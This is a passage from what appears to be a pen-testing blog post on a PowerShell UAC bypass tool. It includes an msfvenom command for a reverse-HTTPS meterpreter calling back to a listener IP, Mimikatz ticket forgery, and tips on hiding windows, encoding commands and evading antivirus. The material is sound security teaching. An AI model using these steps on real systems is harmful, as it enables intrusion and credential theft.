Once elevated privileges are there, we can always elevate to SYSTEM using Enable-DuplicateToken from Nishang/Powerpreter. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3QNQt3HGsbUGyXpDDBmrEqmfpsASgR79x8cSdyauKMB61n7ObuyPf05vhST2P87Fg2qlA22uF-gduunJ706B_pkjD8RCtSG_XLGhtf3CR3vPRmw4aT7WnJu9X2cSJfcKgA45mu2upNI/s1600/SYSTEM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3QNQt3HGsbUGyXpDDBmrEqmfpsASgR79x8cSdyauKMB61n7ObuyPf05vhST2P87Fg2qlA22uF-gduunJ706B_pkjD8RCtSG_XLGhtf3CR3vPRmw4aT7WnJu9X2cSJfcKgA45mu2upNI/s400/SYSTEM.png" width="400" /></a></div>
Bingo!<br />
<br />
In fact, after SYSTEM privs we can use <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1">Invoke-Mimikatz</a> from Powersploit
for using domain tokens as well. Get your Golden/Silver tickets right here! In case you cannot pull scripts from a web server as in
above example, use Invoke-Encode to encode them as compressed base64 and
use with the EncodedCommand (-e or -encodecommand) parameter of
powershell.exe. You may like to use '-WindowStyle hidden' paramter of PowerShell to avoid showing any pop ups to the user.<br />
<br />
There are limitless opportunities with this. Although, metasploit has its own implementation of <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/bypassuac_injection.rb">UAC bypass</a>, we can get a meterpreter with elevated privileges. We can generate a meterpreter in PowerShell using msfvenom: ./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.230.154 -f psh-reflection<br />
<br />
I can never stop stressing how useful PowerShell is for pen testing Windows network. For example, we can use Invoke-PsUACme as a payload with the <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">Client Side attacks</a> initially as well. Lets use Invoke-PsUACme with Out-Word from Nishang. Lets make the function call from the Invoke-PsUACme script itself to avoid unnecessary complex command. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2t6pKw0EUWmKkzH_B-0jN4m2Y9tmQd27WXEKrjs_H9-9Lye5MshSBkmyTnpfD3pezG81MEWdvio2Vd4LtSwXKV1StElIqcnXiDeMsuubUqJrMhSosyIpv9lt37TM6oP8WqYdmAPuMO0/s1600/ClientSide.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2t6pKw0EUWmKkzH_B-0jN4m2Y9tmQd27WXEKrjs_H9-9Lye5MshSBkmyTnpfD3pezG81MEWdvio2Vd4LtSwXKV1StElIqcnXiDeMsuubUqJrMhSosyIpv9lt37TM6oP8WqYdmAPuMO0/s400/ClientSide.png" width="400" /></a></div>
Sweet! An elevated interactive reverse PowerShell shell. <br />
<br />
As you can see implementing existing techniques in PowerShell is very rewarding. It not only increases the understanding of PowerShell but the technique as well.<br />
<br />
<h4>
Limitations </h4>
<br />
Since, Invoke-PsUACme is based on the UACME project which itself implementd techniques used by malware, there are chances that DLLs dropped by it are detected by AV in future. Going by the past record, minor changes in the DLL source should solve this problem, whenever it arises.<br />
<br />
Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently. Please feel free to implement IFileOperation or any other method. I welcome pull requests.<br />
<br />
There are other implementations as well of UAC bypass in PowerShell. See this <a href="http://www.powershellempire.com/?page_id=380">http://www.powershellempire.com/?page_id=380</a><br />
<br />
To better know about the UAC bypass, follow the below links:<br />
<a href="https://www.greyhathacker.net/?p=796">https://www.greyhathacker.net/?p=796</a><br />
<a href="http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html">http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html</a><br />
<br />
Hope you enjoyed the post!<br />
<br />
<h4>
Shameless self promotion</h4>
<div style="text-align: justify;">
If you liked the post and want to
learn more and/or want to support my research and work, join me for a
two days training "PowerShell for Penetration Testers" at:</div>
<div style="text-align: left;">
<b>DeepSec, Vienna (November 17-18th, 2015)</b> - <a href="https://deepsec.net/speaker.html#WSLOT192">https://deepsec.net/speaker.html#WSLOT192</a></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<div style="text-align: justify;">
</div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com3